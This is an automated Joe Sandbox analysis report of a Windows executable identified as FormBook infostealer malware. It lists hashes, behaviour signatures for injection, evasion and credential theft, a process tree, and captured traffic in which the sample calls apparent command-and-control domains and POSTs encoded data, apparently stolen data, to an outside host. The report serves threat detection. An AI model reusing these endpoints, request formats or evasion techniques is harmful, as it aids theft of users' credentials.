Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RN# D7521-RN-00353 REV-2.exe

Overview

General Information

Sample name:RN# D7521-RN-00353 REV-2.exe
Analysis ID:1556224
MD5:143f37f0dafe001d882dfcf2f15245a6
SHA1:43da59f78dd161230d8be6bc7710457e11eaae1e
SHA256:5b3e87b97fbd21afd93be09eaefa31a1582674848bacbb9e9746c2e26a10bf18
Infos:

Detection

FormBook
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files

Classification

Process Tree

  • System is w7x64
  • RN# D7521-RN-00353 REV-2.exe (PID: 3288 cmdline: "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe" MD5: 143F37F0DAFE001D882DFCF2F15245A6)
    • svchost.exe (PID: 3328 cmdline: "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)
      • CuJYYyjxRgkNEt.exe (PID: 1288 cmdline: "C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • xcopy.exe (PID: 3412 cmdline: "C:\Windows\SysWOW64\xcopy.exe" MD5: 361D273773994ED11A6F1E51BBB4277E)
          • CuJYYyjxRgkNEt.exe (PID: 172 cmdline: "C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3592 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.616917024.00000000008E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.396307555.00000000002B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.616838058.0000000000160000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.396316461.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.616820930.0000000000080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Copy From or To System Directory
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xcopy.exe", CommandLine: "C:\Windows\SysWOW64\xcopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: "C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe" , ParentImage: C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe, ParentProcessId: 1288, ParentProcessName: CuJYYyjxRgkNEt.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xcopy.exe", ProcessId: 3412, ProcessName: xcopy.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe", CommandLine: "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe", CommandLine|base64offset|contains: vMM7, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe", ParentImage: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe, ParentProcessId: 3288, ParentProcessName: RN# D7521-RN-00353 REV-2.exe, ProcessCommandLine: "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe", ProcessId: 3328, ProcessName: svchost.exe
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\xcopy.exe, ProcessId: 3412, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe", CommandLine: "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe", CommandLine|base64offset|contains: vMM7, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe", ParentImage: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe, ParentProcessId: 3288, ParentProcessName: RN# D7521-RN-00353 REV-2.exe, ProcessCommandLine: "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe", ProcessId: 3328, ProcessName: svchost.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: RN# D7521-RN-00353 REV-2.exeReversingLabs: Detection: 56%
            Yara detected FormBook
            Source: Yara matchFile source: 00000005.00000002.616917024.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.396307555.00000000002B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.616838058.0000000000160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.396316461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.616820930.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.616853860.00000000002B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.452537297.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.616973792.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.396448093.00000000019D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: RN# D7521-RN-00353 REV-2.exeJoe Sandbox ML: detected
            Source: RN# D7521-RN-00353 REV-2.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CuJYYyjxRgkNEt.exe, 00000003.00000000.380200638.0000000000E8E000.00000002.00000001.01000000.00000004.sdmp, CuJYYyjxRgkNEt.exe, 00000005.00000000.408916636.0000000000E8E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdb source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000003.350686083.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, RN# D7521-RN-00353 REV-2.exe, 00000000.00000003.351128311.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.396344493.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.378610420.0000000000630000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.378319985.0000000000260000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.396344493.0000000000940000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000004.00000003.396292573.0000000001D90000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000004.00000002.617084024.0000000002080000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000004.00000003.396624750.0000000001EF0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000004.00000002.617084024.0000000002200000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: xcopy.pdbN source: svchost.exe, 00000002.00000002.396325219.0000000000544000.00000004.00000020.00020000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000003.00000002.616864409.0000000000844000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xcopy.pdb source: svchost.exe, 00000002.00000002.396325219.0000000000544000.00000004.00000020.00020000.00000000.sdmp, CuJYYyjxRgkNEt.exe, 00000003.00000002.616864409.0000000000844000.00000004.00000020.00020000.00000000.sdmp
            Source: Joe Sandbox ViewIP Address: 15.197.148.33 15.197.148.33
            Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
            Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3290000[1].zipJump to behavior
            Source: global trafficHTTP traffic detected: GET /qq33/?WrGp=yRUDttthc40H6jfP&5RH=i6Dk+UJVjxglEXs3yyUE1WXG/wtHu1mV9FpOihhS4ziFAzHmIjfzSWYGuuWTb7Mve8esrSqeFR09QtNoutRLtyBsWM1L4jpBKikP70GTc17iz2FS/96s1feDLjv+ HTTP/1.1Host: www.ila.beautyAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2019/sqlite-dll-win32-x86-3290000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /ow7i/?5RH=D6NwXqVIZVbqudPYhFuxSgI6F25/rGDj7EaXwER037qfX6kPuWmDPuQzRSnaZsITlUOw5UFltg9ddxyQI16qNu+e65Ogv/e38YRCJEvp7GjjWNBSB6vuUL3Vo0qU&WrGp=yRUDttthc40H6jfP HTTP/1.1Host: www.shintow.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /mdol/?5RH=IBR/N437Xoj/lvQ897DSFCGd1oR1jSFvQ9XvO2IN6lbwsaKUqIYS/t7V4RHRPO7VGkMU2dFR1OPoWNJQfvLnpgskAhvCg85lkqmyzGqwbfp9zK6j91HWEALvJgsG&WrGp=yRUDttthc40H6jfP HTTP/1.1Host: www.mireela.proAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /uao9/?5RH=gsMVmNPJ8N9SSsJigSRkzHU8ucRHA0N0sVKqNnzNMDh6tN9OUV5giohWqtUcjyeiEwOtWu4dkyz3I4t4LNKsaZpWxiv3b+U2cgmSZgLKQ+77F4DmKxGHK+RD911B&WrGp=yRUDttthc40H6jfP HTTP/1.1Host: www.micrhyms.infoAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /62tt/?WrGp=yRUDttthc40H6jfP&5RH=2eR3StT9zNfU5ywXH4HggrTvpCnGbiZlVhDhLCkeE+XsifzX8e14uD6eFFfqVh5KNZSia3m0bcXelGS5q93MwJAmLErFoJd5x6JI2SQSwqfyhCjpW3AVwzoSZD5r HTTP/1.1Host: www.estrela-b.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zdt7/?5RH=OdyTsfpKOp+FbfSCrWaWA4zl2ndKvmvs0o0DPQC5l8EmE472eTQ0Sykym0VZOF0oXIsjWHJk3q5TqJLqfgnsjz8wdkFbxgxZ0u4ZxfA0ZKI/ytukIpl2H+uK2LJW&WrGp=yRUDttthc40H6jfP HTTP/1.1Host: www.meanttobebroken.orgAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /t2sm/?WrGp=yRUDttthc40H6jfP&5RH=94IeUqPLX3ZZBpOCZoSY6HQmnr2N9SvCK3bXujG3CQTlZUuHvWSdlBBRCisXKpTA+iEUA4EAd7TxfJWKcng8Nu4RKxcBvf//lMLbliKMg02h9gbVNiMInhr1eLg3 HTTP/1.1Host: www.mjmegartravel.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.ila.beauty
            Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
            Source: global trafficDNS traffic detected: DNS query: www.shintow.net
            Source: global trafficDNS traffic detected: DNS query: www.mireela.pro
            Source: global trafficDNS traffic detected: DNS query: www.micrhyms.info
            Source: global trafficDNS traffic detected: DNS query: www.estrela-b.online
            Source: global trafficDNS traffic detected: DNS query: www.meanttobebroken.org
            Source: global trafficDNS traffic detected: DNS query: www.mjmegartravel.online
            Source: unknownHTTP traffic detected: POST /ow7i/ HTTP/1.1Host: www.shintow.netAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.shintow.netReferer: http://www.shintow.net/ow7i/Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 2160Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 35 52 48 3d 4f 34 6c 51 55 63 70 74 4e 6b 4b 36 75 66 76 30 6d 46 61 59 65 48 52 4e 48 48 38 2f 68 33 6d 62 35 67 71 73 70 46 39 6f 32 62 75 64 4f 59 55 2f 6c 47 61 4c 44 63 6b 74 61 31 76 47 64 4f 52 5a 67 42 4b 49 70 67 39 6c 75 6e 6c 52 42 78 61 66 42 55 62 30 49 75 75 44 79 50 6d 48 6b 61 69 34 70 61 68 42 66 47 47 4d 31 55 66 6b 41 6f 78 62 50 59 4b 6f 56 4c 48 32 73 68 72 64 67 4c 68 75 7a 4c 4a 64 5a 52 67 42 5a 4e 2f 4e 64 6d 4d 2f 36 67 6c 50 37 77 71 39 58 34 72 62 2b 53 4d 5a 45 4e 46 4d 51 53 74 78 6b 4c 55 72 64 2b 73 38 44 45 38 74 5a 61 57 36 72 39 58 47 47 57 6f 34 65 71 6a 67 58 4c 76 4e 62 74 77 56 7a 4c 30 35 34 50 69 32 4d 31 2b 33 65 36 4c 2b 44 67 33 75 54 38 77 50 69 6a 62 44 36 4c 69 2b 65 37 53 54 39 4e 32 36 68 66 58 2b 57 32 50 6a 56 37 65 48 42 4c 2b 47 44 44 74 70 76 43 50 35 77 65 30 72 4d 46 4e 6e 59 30 34 62 49 39 72 50 54 4a 47 58 68 33 2f 69 56 4a 47 5a 79 67 38 63 2f 44 48 46 55 73 69 30 4e 48 2b 66 64 77 4a 55 73 31 4d 63 31 4b 48 78 61 75 6e 48 42 6d 55 6b 79 41 41 6f 4a 61 69 78 61 2f 33 6a 75 6e 4a 6a 42 46 6b 54 2b 36 5a 39 55 6f 62 30 34 6c 4d 69 51 66 75 6f 41 62 79 63 64 37 59 63 7a 57 33 30 36 49 6b 6c 7a 44 72 4e 30 54 56 56 42 73 32 39 73 68 7a 46 4b 44 4c 6a 75 49 4a 6a 73 6e 6b 54 71 70 43 44 68 2f 4e 55 50 62 74 77 44 62 77 52 46 2b 75 45 55 2b 44 54 49 6e 57 54 78 5a 59 71 39 59 2b 39 4d 34 56 4f 45 4e 4c 46 4b 68 69 49 4a 6d 54 54 7a 61 77 76 43 66 47 4a 37 51 4e 55 66 6f 50 48 79 41 30 6c 2b 6c 4a 43 79 4e 6a 79 54 78 67 56 37 76 33 5a 41 47 7a 31 6d 2f 66 34 2b 32 38 55 55 39 73 2b 6e 4c 4b 6f 43 52 48 51 62 38 75 2f 67 70 35 35 57 2b 31 6d 36 46 50 49 50 50 42 39 4c 52 53 6a 4b 76 48 52 68 44 4b 6f 70 6e 48 6b 34 63 66 45 4a 73 58 54 69 51 54 6f 32 50 7a 58 69 36 68 70 4a 64 50 52 45 66 63 35 7a 4a 51 52 6f 49 69 43 55 73 6c 44 48 7a 4c 46 6e 35 64 55 39 41 74 4d 70 66 76 6b 75 73 76 6c 36 4d 67 71 6b 32 64 69 62 55 5a 6e 4c 72 43 33 6c 63 46 2f 2b 66 52 6f 4c 67 61 69 69 65 49 6c 5a 4b 65 77 2f 34 38 4b 4d 52 56 51 55 69 47 63 51 64 51 43 47 45 2b 63 35 50 75 45 38 71 69 58 70 2f 42 73 68 61 39 6a 2b 55 75 33 38 6b 55 36 53 64 46 4d 39 38 62 4f 44 6f 4d 4e 49 61 30 4f 46 66 30 4e 69 35 79 35 4f 69 76 46 39 6d 41 56 67 65 34 4c 79 43 2b 4e 2f 36 56 51 6d 39 7a 63 6b 52 33 4c 77 59 57 39 53 4a 6b 4e 64 32 5a 5a 41 51 6c 35 54 79 43 43 71 67 43 44 49 74 59 73 69 34 62 33 39 62 4c 41 65 54 4d 49 30 32 4d 5a 6f 2b 67 6b 45 6a 63 42 58 45 6a 4c 70 37 42 70 41 2b 36 76 43 59 67 75 73 46 77 73 4c 74 77 42 52 68 41 78 73 71 32 58 30 41
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 05:46:03 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 05:46:06 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 